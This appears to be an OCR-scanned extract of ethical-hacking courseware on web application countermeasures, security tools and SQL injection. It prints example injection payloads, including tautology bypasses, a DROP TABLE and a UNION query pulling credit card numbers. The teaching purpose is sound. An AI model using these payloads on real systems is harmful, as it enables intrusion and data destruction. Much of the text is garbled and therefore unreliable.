Blockexternalreferences anduse pre-fetched content whende-referencing URLs
Maintain andupdate a secure repositoryof XML schemas
Usepassword digests/Kerberos certificatesi n SOAPheaders
tickets/X.509 for
authentication
Usea digital for signingmessagesat the recipient's
signature endandmaintain the
ofthemessages
integrity
UseURLauthorizationto restrict accessto theweb service file (.asmmx)
Authorizeaccess to WSDL
filesusing NTFSpermissions
protocols
Disablethe documentation the dynamic
to prevent of WSDL
generation
ical andCountermensores
Mackin ©by E-Comel
Copyright
Verify
thecaller'sendpoint
in theSOAP beforedetermining
message whetherthe
SOAPmessageis processed
by the BPEL engine
Disablethe SOAPAction field suchas createUseror deleteUseri n the HTTPrequest
Avoidusingeasily
guessable
SOAPActionterminologies
DisabletheSOAPAction
attributewhennot in use
Makesure to compare the operation
withintheSOAPAction body
andthe SOAP
Clickjacking
Attack
a
>Use server-side
methodsuchas X-Frame-Options
and ALLOW-FROM
SAMEORIGIN, header
its
anduse options
URIto preventthe site from being
DENY,
framedoutside
the
domain methodssuchas Framebusting
Neveruse client-side or Framebreaking
as they
can
be bypassedeasily
Maskthe HTML documentand revealit onlyafter verifying
that the pageis not
framed
Use the Content-Security-Policy (CSP)
HTTPheader as it provides
considerable
for defining
flexibility deployments
sources i n complex
Hijacking
JavaScript
Use
.innerText
rather inthan .innerHTML to encodethetext automatically
JavaScript
Avoid using thefunctionevaldueto its vulnerablenature
Do not write serialization
code
library
Usetheencoding to safeguard
theattributes
anddataelements
andavoid
building
XMLdynamically
UseSSL/TLS
for secure communication andperform on the server
encryption
instead
oftheclient-sidecode
BuildXMLusinganyappropriateframework;
avoidbuilding
XMLmanually
Makesure to return JSONwith an object
externally,
suchas {“result―:
[(“object―:―
inside
array"}]}
UsernameEnumeration
©.
that
inputs
Ensure
error
generic that identifiers
outputs
containing
includeuser
messages
produce only
randomly
Use sequential
dataforusernamesinsteadof
generated numbers
properdefenses
Employ SQLinjection
against andXSSattacksto preventdumpable
user enumeration
‘Always apply
to
makesure to
automatic datacollection
CAPTCHAalltheinputaccepting
pagesto prevent
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usea WAFto detectandblockall the individual that tryto make
IPaddresses
severalrequests
‘Apply or padding
two-factorauthentication(2FA) techniques
to the responsetime
to preventusernameenumeration
Userandomandcomplex
usernames whencreating
the ActiveDirectory
username
list
Always use only anddifficult-to-guess
complex passwords the default
andchange
usernames andpasswords
the
executing request
Ensurethat all password a re usedonly
reset URLs once andset the expiry time limit
through
Avoidautomatedrequests programsandenforcehumanchecksusing
CAPTCHA
generated
Restrictthenumberof requests fromany IPor devicewithin a stipulated
time
Useadvanced multi-factor (MFA)
authentication techniques
to preventaccount
hijacking
with passwordreset tokens
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
=
S. xe
Xe ecenat
ical andCountermensores
Mackin ©by E-Comel
Copyright
RASPfor Protecting
WebServers
el
recan acurty
attacks web
(© detectrumime
conruning
"Runtimeapplicationprotection
vulnerable the
‘iden
RAS)provides
onthe
to andnon-web
apliatin
layer and provide etter vty
on a server
ofthe
{Canara} =
§
© visitty
ao
©Colaberation
andDevops s
we
©Penetration
Hoary)
testing
RASPfor Protecting
Web Servers
RuntimeApplication
SelfProtection(RASP)
is a technology
thatprovides to applications
security
that run on a server. RASPc an beusedfor detecting runtime attackson the real-timesoftware
applicationlayer andcan provide bettervisibility
of hidden vulnerabilities.
RASP c an detectany
maliciousactivityin the incomingtrafficand alsovalidatedata requests. RASPprotectsboth
‘webandnon-webapplications and it can be usedto prevent fakeprogramsfrom being
executedinsidethe application. RASPperforms continuous monitoring to helpremediate
attackssuchas unknownzero-day attacksat an earlystage without any humanintervention,
‘The
RASP layer is placed
withintheapplication
code.It deploys
bymonitoring thetrafficcoming
into the server and applies
protectionmechanisms
wheneverthreat vectors are detected.All
the requestsare examined through the RASPlayerpresentbetweenthe server and the
application
without affecting
the performance
of the application.
Furthermore,
RASPcan
minimized falsepositives.
generate
Benefits
of usingRASP
=
Visibility:
RASPoffers greatervisibility
and lets the user have a detailedview of the
application
to monitor the attacks
Collaboration
and DevOps: It provides
bettercollaboration
andDevOps
as it offers
that
transparency can provide
similar and detailed information to both security
professionals
anddevelopers
Penetrationtesting:Theincreased of RASPhelps
visibility i n avoiding
duplicate
testing,
It alsoprovides
informationaboutsuccessfulattacksandpreviously
testedapplications
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
Incidentresponse:RASP supports to facilitate
incidentresponse forsecurity
logging and
compliance bylettingthe user reporton customizedevents without modifyingthe
application
IK Block?y
SQLServer
14.103:Overviewof RASP
Figure
ical andCountermensores
Mackin ©by E-Comel
Copyright
BugBounty
Programs
(©The.
bounty
program
challenge
vulnerabltes
hosted
by
organizations,
software
developers
ia website,or t o tech
secur
developers flltodetet
ofthe
Individuals
or etical hackers the wnerbities ae rewardedaccordingly
whe report based
on the severity
love bugs
Many
and conductbugbounty
orgpnizations companies
patching
ignored
wunerbile
to strengthen
programs thelr cyber by
security
BugBountyPrograms
bugbounty
‘A programis a challenge hostedbyorganizations,
or agreement websites,
or
softwaredevelopers for tech-savvyindividualsor ethicalhackersto participate
andbreak into
theirsecurityto reportthelatestbugs andvulnerabilities.Thisprogramfocuses on identifying
the latestsecurityflawsi n the softwareor any web application that most securitydevelopers
failto detectandwhichmayhenceposea great threat.Therefore,individuals
or ethicalhackers
who reportthe vulnerabilitiesare rewardedaccordingly basedon the severity of the bugs
Thus, any threat or flawthat evadesthe developer can be mitigated beforeit paves the way to
sophisticated cyber-attacks.Manywhite-hathackerscontributeto this programas partof a
comprehensive vulnerabilitydisclosureframeworkandgetrewardedfor theirwork.
Manyorganizations benefitfromsuchprograms,a s theyneedto maintain a keenwatch on
their system securityand identify ignored vulnerabilities.Most of the latestbugs that are not
detectedbylegacy securitytestingtechniques andsoftware toolscan be exploited, resulting in
major data loss.Suchprogramscan also helporganizations to avoid lossof money and
reputation i n the case of a databreach, as offering
rewardsthrough the bug bounty programis
more economical. Therefore, most of the largecompanies u se this programforstrengthening
their security,
whichin turn enhances
websitesandprograms.
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
Security Tools
Testing
Sinica | |seam|
omnes
Ags| n
[S)
Security
Web Application Tools (Cont'd)
Testing
ExploitationFramework(BeEF)
Browser metasloe
Web Application
Security
Testing
Tools
are various web application
‘There a ssessmenttoolsavailablefor scanning,
security detecting,
andassessing the vulnerabilities/security
of web applications.
Thesetoolsrevealtheir security
posture;you can use themto find waysto hardensecurity andcreate robustweb applications.
Furthermore, these tools automate the processof accurate web application security
assessment.Thissectiondiscusses some web applicationsecurity
tools.
testing
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Acunetix
WVS
Source:https://www.acunetix.com
WVSchecksweb applications
‘Acunetix for SQLinjections, etc. It
cross-site scripting,
includes advanced penetration testingtools,suchas HTTPEditorandHTTP Fuzzer.It
scans the portsof a web server and runs security
checksagainst
networkservices. It also
tests web formsand password-protected it provides
areas. Furthermore, effective
vulnerability byallowing
management third-party GitLab,
issue trackerssuchas Jira,
GitHub,
andFogBugz.
e acunetix
igure14.104Screenshot
N-StalkerWebAppSecurity Scanner
Web
of Acunetix Vulnerability
Scanner
Source:https://www.nstalker.com
N-Stalker
WebAppSecurity Scannerchecks forvulnerabilities
suchas SQL XSS,
injection,
and other knownattacks.It is a usefulsecurity system/security
tool for developers,
administrators, andstaff,as it incorporates
IT auditors, thewell-known“N-Stealth
HTTP
ical andCountermensores
Mackin ©by E-Comel
Copyright
Scanner―
Security alongwith a
and its databaseof 39,000web attack signatures
component-oriented
webapplicationsecurityassessmenttechnology.
=
14.105:
Figure SereenshotofWStalker
Framework(BeEF)
BrowserExploitation
WebApplication
Security
Scanner
Source:http://beefproject.com
TheBrowser Exploitation Framework(BeEF) is a n open-sourcepenetrationtesting tool
usedto
test and exploit
the penetration
application
tester with practical
andbrowservulnerabilities
and browser-based
web applications vulnerabilities.It provides
client-sideattack vectors and leverages
to assessthe security
web
of a targetand perform
further intrusions.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
14.106:
Screenshot
Someadditionalwebapplication
of
arowser
Expleitaton
testingtoolsare
security
Framework
as
(808)
follows:
+
Metasploit
(https://www.metasploit.com)
+
PowerSploit
(https://github.com)
+
Web
Tool
Watcher Security (https://www.casaba.com)
Netsparker(https://www.netsparker.com)
Arachni(http://arachni-scanner.com)
ical andCountermensores
Mackin ©by E-Comel
Copyright
WebApplication
Firewalls
Web Application
Firewalls
Webapplication
firewalls(WAFs) web applications,
secure websites, andwebservices against
knownandunknownattacks.They
preventdatatheft andmanipulation
andcustomer information.Someof the most commonly
usedWAFSare of
sensitive corporate
as follows:
=
dotDefender
Source:http://www.applicure.com
dotDefenderâ„¢is a software-based WAFthat protectsyour websitefrom malicious
attackssuchas SQLinjection, pathtraversal,cross-sitescripting,andothersthatresult
i n websitedefacement. It complementsthe network firewall, IPS, andother network-
products.
basedInternet security HTTP/HTTPS
It inspects trafficfor suspiciousbehavior.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Sosee Supe Single
ote (Safe)
Patten» Patter
qeceocccs
Classe
SOLC omment
SAL
C omm
‘Union
Selec’
Statement
SQLCHAR
Type
SYSCommands
SOL
ISSRVROLEMEMBER
followed
by(
NSSQL
SpecieSQLInjection
14.107;ereenshot
Figure of dotDefender
web firewall
application
Someadditional firewallsare asfollows:
webapplication
=
VP(https://www.port80software.com)
ServerDefender
=
HCLAppScan®
Standard(https://www.heltech.com)
+
AppWall
Radware's (https://www.radware.com)
WAF(https://wwrw.qualys.com)
Qualys
Firewall(https://www.barracuda.com)
WebApplication
Barracuda
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
We apoleaton
concepts
Variouswe applationatacks
attack
autheniation
tnayangwebappliations, lent sideconto
bypassing
Various
web
apglcatonhacking
tools
webva
web
As, web
Hackingapplications
attemptsbythreatactors
webhooks,
and sels
Module Summary
Thismodulepresented
web application various web application
It alsodiscussed
concepts.
attacksi n detail.Furthermore, thewebapplication
it described hacking methodology i n detail
In addition,i t illustratedvarious web applicationhacking tools. It alsodiscussed web API,
‘webhooks,
against
andwebshellconcepts.
web APIs,webhooks,
threat actors’
Moreover,it explained
and web shells.Subsequently,
waysofhacking
it presented
attemptsto hackweb applications. Finally,
webapplications
various countermeasures
it endedwith a detailed
via
discussion on how to secure web applicationsusingvarious security tools,
In the next module,
we will discuss
i n detail howattackers
as well as ethicalhackers
and pen
testers perform
SQLinjection attackso n thetargetwebapplication.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Certified
| Ethical Hacker
Module15:
Injection
SQL
Module Objectives
Understanding
SOLInjectionConcepts
Understanding of SQL
VariousTypes Attacks
Injection
SOL
Understanding Methodology
Injection
VariousSa njectlonT oo
Understanding
injection
OverviewofSOL Countermeasures
of SQL
‘Overview
Various Detection Took
nection
Module Objectives
SQLinjectionis the most common anddevastating
attackthatattackers
c an launch
to take
controlof a website,Attackersuse various tricksand techniques to compromise data-driven
applications,
‘web causingorganizations to incur severe losses
i n terms of money,reputation,
data,and functionality.
Thismodulewill discuss SQLinjectionattacksas well as the toolsand
techniques
usedbyattackers
to perform
suchattacks.
=
ofthe
At theend this
module,
SL
Describe
willable: you
injection
be
concepts
‘=
=
various
types
Perform
ofSQL
injection
methodology
Describethe SL injection
attacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
‘Types
ofSOLInjection Evasion
Techniques
SQL
Injection
Methodology. Countermeasures
SQLInjectionConcepts
Thissection discusses the basicconcepts
of SQLinjectionattacksandtheir intensity.
It starts
with a n introductionto SQLinjectionand the basicsrequiredto understandSQLinjection
attacks,followedbysome examples ofsuchattacks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
What is SQLInjection?
1 web
througha
s a technique
501injection
application for
of unsanitiedinputvulnerabilities
usedto take advantage
backenddatabaze
bys
execution
to passSALcommands
SQL attack
(©
used
injection
‘rectly
isabasic
fromthedatabase
to ethergainunauthorized
acess toa database
or retrieve information
1@
web
Itisaflaw i n webapplications
andnot a database
‘Why
or server issue
on
theapliations
way
‘Based
proces
supplied
dts, used
wieof
Implementtheflowing
andthe
typesof aac:
they user SA injections canbe to
an of
‘Authentication
andAuthorization
bypass compromised
Integy aati Data
Whatis SQL
Injection?
StructuredQueryLanguage (SQL)is a textual language used by a databaseserver. SQL
commands usedto perform
operationson the databaseincludeINSERT,SELECT,UPDATE, and
DELETE,Thesecommands are usedto manipulatedatain thedatabaseserver.
Programmers SQLcommands
use sequential with client-supplied
parameters,makingit easier
for attackersto injectcommands. SQLinjectionis @technique usedto take advantage of
Unsanitizedinput vulnerabilitiesto pass SQLcommandsthrough a web application for
execution bya backend database. In thistechnique,theattackerinjects
maliciousSQLqueries
into the user inputform either to gain unauthorizedaccess to a databaseor to retrieve
informationdirectly
from the database,Suchattacksare possiblebecauseof a flaw i n web
applications
andnot becauseof anyissuewith thedatabaseor theweb server.
SQLinjectionattacksuse a series of maliciousSQLqueries or SQLstatementsto manipulatethe
database directly.
An application often uses SQLstatements to authenticate users to the
application,
validaterolesand access levels,
store and obtaininformationfor the application
the application
anduser, and link to otherdatasources. SQLinjectionattackswork because
doesnot properlyvalidatean inputbeforepassingi t to an SQL
statement.
Botherabout SQLInjection?
‘Why
SQLinjection websites.An attackcan be attempted
is a majorissue for all database-driven on
any normalwebsiteor softwarepackage basedon how It is usedand how it processes
user-
supplied
data.SQLinjection can beusedto implement the followingattacks:
‘=
Authentication
Bypass: thisattack,
Using logsonto an application
an attacker without
providing
a valid usernameand password,
andgainsadministrativeprivileges.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Authorization
Bypass: this attack,a n attackeraltersauthorizationinformation
Using
an
storedi n thedatabasebyexploiting
InformationDisclosure:
SQL
injection
vulnerability.
this attack,
Using an attackerobtainssensitive informationthat
is storedin thedatabase.
Compromised
DataIntegrity:
malicious aweb
Usingthisattack,an attackerdefaces
content into web pages,or altersthecontents ofa database.
page, inserts
Remote CodeExecution:Usingthisattack,
an attackercompromisesthe hostOS.
ical andCountermensores
Mackin ©by E-Comel
Copyright
andServer-sideTechnologies
SQLInjection
|| with
Serverside Powerful
srverside ikeASPNET
technologie anddatabaseserversa llowdevelopers
to
data-drivenwebsites,
‘Technologycreate dynamic andwebapps needle eave
be SL
T hepowerofASPNET
a ndSOL
c an easly exploited
byhackers
using attacks
injection
Susceptible|
| _Alrelstioal
databases,
SaLinjctonO82,areto SALSere Orc IM andMYSQL,susceptible
Databases stacks
a
apps
that
SQLinetonstacks
websitesandweb
d onot expo speci software
do nt followsecre coding
‘manipulating relational
datastoredin databace
instead
vulnerability theytarget
for acesing and
practices
SQL
InjectionandServer-sideTechnologies
Powerfulserver-side technologiessuchas ASP.NET anddatabaseservers allow developers to
create dynamic, data-drivenwebsitesand web applications with incredibleease. These
technologies implement businesslogico n the server side,
whichthen serves incomingrequests
from clients.The server-sidetechnology smoothly accesses,delivers,stores,and restores
information. Variousserver-sidetechnologies include ASP,ASP.Net, Cold Fusion, JSP,PHP,
Python, Rubyo n Rails, and so on. Some of thesetechnologies are prone to SQLinjection
vulnerabilities,and applicationsdeveloped usingthese technologies are vulnerableto SQL
Injection attacks.Web applications use various databasetechnologies as part of their
functionality. Some relational databasesused for developing web applications include
MicrosoftSQLServer, Oracle, IBM DB2, and the open-source MySQL. Developers sometimes
unknowingly ignoresecure coding practices when usingthesetechnologies, whichmakesthe
applicationsandrelationaldatabases vulnerableto SQLinjection attacks.Theseattacksdo not
exploita specific vulnerability;
software’s instead, theytargetwebsitesand webapplications
that do not follow secure coding practices to access and manipulate the data stored i n a
relationaldatabase.
ical andCountermensores
Mackin ©by E-Comel
Copyright
HTTPPOSTRequest
Understanding
Ja
auser
When
Information
provides
and ccks Submit,
browser
the
submits stringto
thewebserver contaning
Users credential
the
raeasenitaatal
This
i HTPS
string sible
ofthe HTTP
or
as follows:
request
inthe
POST
body Vearame
a
Ce
SOL
the
queryat
(Sesrnane =
database
vanieh' and
“<form
actions"
Paseveeds
/ogi-bin/login―
dapit Gporpusreced
m ethedepost>
tamepesoner®>
parcword ‘eingeon’?
=
“<inputtypansubadt
valuestogia>
HTTPPOSTRequest
Understanding
‘An
HTTPPOST requestis a methodfor carryingthe requested data to the web server. Unlike
the HTTPGET method, the HTTP POSTrequest carries the requested data as a partof the
message body.Thus,itis consideredm ore secure thanHTTPGET.HTTPPOST requests can also
passlarge a mounts of data to the server. They
are idealfor communicating with an XML web
service. Thesemethodssubmitand retrieve datafromtheweb server.
Whena user provides informationandclicksSubmit,
the browsersubmitsa stringto the web
server thatcontainstheuser’s
POST requestas
credentials.
is
Thisstring visiblei n thebody
of the HTTPor HTTPS
ical andCountermensores
Mackin ©by E-Comel
Copyright
Account
Login
Username (Gait
password (Gineoe
<form action="/cgi-bin/login"
method=post>
Username: <input type=text name: ername>
Password: <input type=password
name=password>
Figure
25.1Example
ofHTTP
POST
request
Module5 2004
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Normal SQLQuery
Understanding
nt
ConstructedSOLQuery<:
‘Server
sideCode
(Badlogin
aspx)
Normal SQL
Understanding Query
‘A
query isan SQLcommand.Programmers write and execute SQLcodein the formof query
statements. SQLqueriesinclude selecting
data,retrievingdata, inserting/updating
data,and
creatingdata objects
suchas databasesandtables.Query statements beginwith a command
suchas SELECT,UPDATE, CREATE,or DELETE.Queriesare usedi n server-side technologies
to
communicate with an application's
database.A user requestsuppliesparameters to replace
placeholders
that maybe usedi n the server-sidelanguage.From this,a query Is constructed
andthenexecutedto fetchdataor performothertaskson the database.
Thediagram
belowshowsa typical
it displays
uponexecution,
SQL
query. values,and
It is constructedwith user-supplied
resultsfromthe database.
ConstructedSOL
Query«
Code
Server-side (Becginanor)
of15.2:Example
Figure normal
ical
SL query
andCountermensores
Mackin ©by E-Comel
Copyright
Understanding Injection
an SQL Query
†œA t t ac k e r
Launching Injection
SQL
SELECT
Count
(#)FROM Usere WHERE Userttne "ako Password" springtiela’
SAL Executed
Query Cater
arenow
comments
an SQL
Understanding Injection
Query
SQLinjectionquery exploits
‘An the normalexecution of SQL. An attackersubmitsa request
with valuesthat will execute normally but return datafromthe database that the attacker
seeks.Theattackerc an submitthesemalicious valuesbecauseof the inability
of the application
to
filter
thembeforeprocessing.
thenthe application
If thevaluessubmittedbytheusers are not properly
can potentiallybe targetedbyan SQLinjectionattack.
validated,
HTMLformthat
‘An receives and passesinformationposted bythe user to the ActiveServer
Pages (ASP) scriptrunningon an IIS web server is the bestexample of SQLinjection.The
informationpassed is the username and password. To create a n SQLinjectionquery, an
maysubmitthe following
attacker valuesin application
inputfields,suchas theusername and
password fields.
Username: Blah’
or 1=1
Password: Springfield
replace
partof the normalexecution of the query, theseinput valueswill
‘As placeholders,and
the
query
will appearasfollows:
SELECT Count (*) FROM Users
Springfield’ ;
WHERE UserName='Blah' or I=1 AND Password=' --'
of
Acloseexamination this query revealsthat the conditioni n the whereclausewill always
true. Thisquery successfully
be
executesas there is no syntaxerror, andit doesnot violatethe
of
normalexecution the query.
Thediagram belowshowsa typical
SQLinjection query.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Attacker
Launching
SL injection
S01
QueryEoueted
wo Cade char == ew ements
Figure
15.3:
of
SL
injection
attack
xample
Module5 2007
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Understanding
an SQL QueryCode Analysis
Injection -
© Aerts ver
Because»
pir of hphensdenotethe besining
of»
comment
in
SOL the becomes
query
steing eteQry =
"SELECT
Count(*) FROMUsers HHEREUsezWanen'â„¢+
an SQL
Understanding InjectionQuery—Code
Analysis
Codeanalysis or code review is the most effectivetechnique for identifying vulnerabilitiesor
flawsi n the code.An attackerexploits the vulnerabilitiesfound i n the codeto gainaccess to the
database. Anattackerlogs into an account bythe following process:
1. Auserenters a username andpassword that matcha recordi n the user'stable
2 ‘A dynamicallygenerated SQLqueryis usedto retrievethenumber of matching rows
3, Theuser is thenauthenticated
andredirectedto the requested page
or 1=1~, thenthe SQL
4, Whenthe attackerenters blah’ query will looklike
SELECT Count (*) FROMUsers WHEREUserName='blah' Or 1=1 --'
AND
Password=""
pair of
‘A indicatethe beginning
hyphens therefore,
of a comment i n SQL; the query
simply
becomes
SELECT Count(*) FROMUsers WHEREUserName='blah’Or 1=1
string strQry
= "SELECT Count(*) FROM Users
"+
WHEREUserName
txtPassword.Text +
ical andCountermensores
Mackin ©by E-Comel
Copyright
Example Vulnerable to SQL
of aWebApplication Injection:
BadProductList.aspx
Thisp at splaysproducts tromthe
Northwind database, allowsusers
t o iter theresultingst ofproducts
Using texto ald titer
Uketheprevious
{Badtopn
vulnerable
example
asp),t hsede s
attacks
SL injection
T h eescuteSas dynamically
anstrted from wser-supplied
Module5 2009
Page ical andCountermensores
Mackin Copyright
by E-Comel
©
(<)>)
hitp://aww certitedhackercom/BadProductUstsox
15.4:Example
Figure of vulnerable
web appeation-BadProductist
aspx
Module5 2010
Page ical Mackin
and ©
Countermensores
Copyright
by E-Comel
Example of aWebApplication
Vulnerable to SQL
Attack Analysis
Injection:
seeder
rts
Q [o)
SQLQuery
Executed
Vulnerableto SQL
of aWebApplication
Example Injection:
Attack Analysis
Most websitesprovide searchto enableusers to find a specificproduct or service quickly.
A
separateSearch fieldis maintained on thewebsitei n an area that is easilyviewable.As with
any other inputfield,attackerstargetthis field to performSQLinjectionattacks.An attacker
entersspecific
inputvaluesi n the Searchfield to performan SQLinjectionattack.
CertifiedHtackerShop.com
SOLQuery
Executed
Figure
of
15.5:Example webappliation
vulnerable
Module5 2014
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
of SQLInjection
Examples
[cme
[tac
ig
sor
ch| sc
cur
tant)
ring
oe crcour
so
inom
HCame
ered
hn hnnee CertfedHackercom
Forgot
Password
of SQL
Examples Injection
SQLinjectionquery exploits
‘An the normalexecution of SQL.
Theattackeruses various SQL
to the
commandsmodify values
i n thedatabase.
CertifiedHacker.com
oO
stackerLaunching
5 Injection
Forgot
Password
EmailAddress
Providean emaila ddress
wherewe
tendyourpossword
‘con ret
link
‘SQ VuinerableWebsite
Injection
15.6:Gxample
Figure ofSL Injection
attack
Module
5Page
2012
tical
Making
and by CountermensoresCopyright©
Comet
Thefollowing of SQLinjection
tablelistssome examples attacks
Example AttackerSQL
Query SQLQuery Executed
SELECT b-passwe,
jb-email, jb-ogin_id,
jb-customers
UPDATE
Updating info@certifiedhacker.com’
Table
WHERE
jason@springfield.com;
SET
jb-emai
email
jb-last_name
FROMmembersWHERE
UPDATE jb-customers,
“info@certifiedhacker.com’
WHERE
sson@springfield.com;
~;
jb-email,
SELECT b-passwe,
jb-ogin_id,
INTOjb-customers
ISERT (jb- jb-last_name
FROMmembersWHERE
Adding
New ‘email’
last_name')
VALUES INTO
jb-passwajb-login_id,'b- =
"blah;
INSERT jb-
customers('jb-email'jb-passw!
Records
‘hello’,
springfield); VALUES
(jason@springfield.com’
jason’,jason
jason’
login_idjb-last_name')
(jason@springfield.com’,’hello'
‘Jason
springfield);
AND1=(SELECT
Identifyingblah’ COUNT(*)
FROM SELECT b-passwe,
jb-email, jb-ogin_id,
theTable mytable);
Name
~
jb
=blah’
Note:Youwillneedto guess
jb-last_name
tablenames here
FROMtableWHERE
email
COUNT(*)
AND1=(SELECT
FROMmytable);
~';
SELECTjb-email,b-passw,
jb-ogin_id,
Deleting
a
blah’;
DROPTABLECreditcard; jb-last_name
FROMmembersWHERE
Table jb-emailblah’;
=
DROPTABLE
Creditcard;
Returning SELECT*
FROMUser_DataWHERE
More Data
Table
1 5.1:AttackSOL
Email_|O
q ueries
="blah’
OR
1=1
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow
Injection
SQL Concepts
SQL
Tools
Injection
SQL
Injection
Methodology. Countermeasures
Types
of SQLInjection
©sQLinjection ° e
VinesenSA Rate
}-->(Y
GYtrsandsatniecion umonsarmecien) (fetes
Biindinferent
SQL
nection Vente
Wtetatoey
W e
inn
iecomment
commer
Yt
YR) Premera
Ar
Typesof SQL
Injection
Se
various tricksandtechniques
Attackersuse to view, manipulate,
insert,anddeletedatafroman
database.
application's Depending on the technique used,there are severaltypesof SQL
injection the various typesof SQLinjection
attacks.Thissection discusses attacks.Attackersuse
attacksin manydifferent
SQLinjection waysbycorrupting SQLqueries.
ical
Mackin
and Copyright
©
by Countermensores E-Comel
In an SQLinjectionattack,theattackerinjectsmaliciouscodethrough query that can
an SQL
readsensitive dataandeven can modify
(insert/update/delete)
it.
Thereare three main typesof SQLinjection:
=
In-bandSQLInjection: An attackeruses the same communication channelto perform,
the attackand retrieve the results.In-bandattacksare commonly usedand easy-to
SQL
exploit injectionattacks.
error-basedSQLinjection andUNIONSQL injection used
The mostcommonly in-band
SQLattacks
injection are
Blind/Inferential
SQL Injection:
In blind/inferential the attackerhasno error
injection,
messages the attackersimply
fromthe systemto work on. Instead, sendsa malicious
SQLquery to the database.Thistypeof SQlL injectiontakesa longer
time to execute
becausethe resultreturnedis generally
i n Booleanform.Attackersuse true or false
resultsto determinethe structure of the databaseand the data. In the case of
inferential
SQLinjection,no data is transmitted through thewebapplication,and it is
not possible therefore,
for an attackerto retrieve the actualresultof the injection; itis
SQL
calledblind injection.
Out-of-BandSQLInjection: Attackersuse differentcommunication channels (suchas
databaseemailfunctionality and loading
or file writing functions)
to performthe attack
andobtainthe results.Thistypeof attackis difficultto performbecausetheattacker
needsto communicate with the server and determinethe featuresof the database
by
used thewebapplication.
server
belowshowsthe different
Thediagram typesof SQLinjection:
@ SALInjection ® e
{== > mn
‘ind/eterertia
Sat (7
tmbanéinjectionod
Y
uwon
tnceer
satineaion) (7
e
Mepafewcty
satinjection
ss
vo
Figure of SAL
15.7-Types Injection
ical andCountermensores
Mackin ©by E-Comel
Copyright
In-BandSQL
Injection
(0 Atachrs
channel
he
use the same
of SQL
communieation to perform attackand
‘Typesin-band Injection
etree theets
Trorbared
SOL onsen,
Injection
ents tht
‘eacesnetonaysere baingtit heey
‘Tewelosy
[Peas ut rsa eo he quis
‘egal/Logealy
Incorrect Overy
$0LInjecu
In-BandSQL Injection
In in-bandSQLinjection,
attackersuse the samecommunication channelto perform
theattack
and retrieve the results.Depending
on the techniqueused,
there are various typesof in-band
SQLinjectionattacks.The most commonly usedin-bandSQLinjectionattacksare error-based
SQLinjection andUNION SALinjection.
Thedifferent
typesofin-band SQLinjection a re asfollows:
=
Error-based SQLInjection
attackerintentionally
‘An inserts bad inputsinto a n application,
causingit to return
database errors. Theattackerreadsthe resulting database-level
error messages to find
an SQL injectionvulnerability
in the application.Accordingly,
the attackerthen injects
designed
SQLqueriesthat are specifically to compromisethe data securityof the
application,
Thisapproachis veryusefulto builda vulnerability-exploiting
request.
SystemStoredProcedure
Theriskof executinga malicious SQLquery i n a storedprocedure
increases if the web
applicationdoes not sanitize the user inputsused to dynamically construct SQL
statements for that storedprocedure.
An attackermay use maliciousinputs execute
the maliciousSQLstatements in the storedprocedure.
storedprocedures theirattacks.
to perpetrate
Attackersexploit
databases’ to
For example,
Create procedureLogin @user_name varchar (20), @password
varchar (20) As Declare @query
1 from usertable
=
‘+ Gpassword
Where username
exec(@query)
varchar (250) Set @query ‘ Select
Go
‘
+ @user_name
+ ‘ and password
=
=
ical andCountermensores
Mackin ©by E-Comel
Copyright
enters
following
Iftheattacker
stored procedure
password.
running
the
in the backend, he/she
inputfieldsusingtheabove
inputsi n the application
will be able to loginwith any
or 1=1'anypassword
Userinput:anyusername
IMlegal/Logically
IncorrectQuery
attackermaygainknowledge
‘An illegal/logically
byinjecting suchas
incorrect requests
injectable parameters, data types,n ames of tables,and so on. In this SQLinjection
attack,an attackerintentionally sendsa n incorrect query to thedatabaseto generate
an
error message that maybe usefulfor performing furtherattacks.Thistechniquemay
helpa n attackerto extract the structure of the underlyingdatabase.
For example, to find the columnname, an attackermaygive the following malicious
input:
Username:
'Bob―
Theresultantquerywill be
SELECT * FROMUsers WHEREUserName = 'Bob"' AND password=
the abovequery, the databasemay return the following
After executing error message:
"Incorrect
Syntaxnear Unclosed
‘Bob’. m
quotation arkafterthe characterstring AND
"
Password="xxx"
UNION
SQL
Injection
The“UNION SELECT― statement returns the union of the intended datasetand the
targetdataset.In a UNIONSQLinjection, an attackeruses a UNIONclause to append a
malicious queryto the requested query,as showni n the following example:
SELECT Name, Phone,Address FROM Users WHERE Td=1 UNION ALL
SELECT creditCardNumber,1,1 FROM CreditCardrable
Tautology
Ina tautology-based SQLinjection
attack,an attackerusesa conditionalO Rclausesuch
to bypass of
that the condition theWHEREclausewill always
user authentication.
be true. Suchan attackcan be used
Forexample,
SELECT * FROMusers WHEREname
= ‘’
OR Vs
Thisquerywill always
betrue,as thesecondpartof theORclauseis always
true.
ical andCountermensores
Mackin ©by E-Comel
Copyright
End-of-Line Comment
In this typeof SQLinjection, SQLinjection
an attackeruses line comments in specific
inputs.Comments i n a line of codeare often denotedby(-~), andtheyare ignored by
the query.An attackertakesadvantage of thiscommenting featurebywritinga line of
code that ends i n a comment. Thedatabasewill execute the codeuntil it reachesthe
commented portion,afterwhichit will ignorethe rest of the query.
For
example,
SELECT * FROMmembers WHEREusername
"password! = 'admin'--' AND password=
‘admin’,
InclineComments
Attackerssimplify
an SQL attackbyintegrating
injection multiple
vulnerableinputs
into
query usingin-line comments. This typeof injections
a single allowsan attackerto
bypassblacklisting,
remove spaces,obfuscate,anddeterminedatabaseversions.
For
example,
INSERT INTO Users (UserName,isAdmin, Password)VALUES
(" $username." 0, '.$password."")"
querythatprompts
isa dynamic
user
a new to enter a username andpassword
Theattackermayprovide
UserName
=
Attacker’, malicious
inputs
1, /* as
follows.
Password
=*/'mypwd
After these maliciousinputs are injected,
the generated
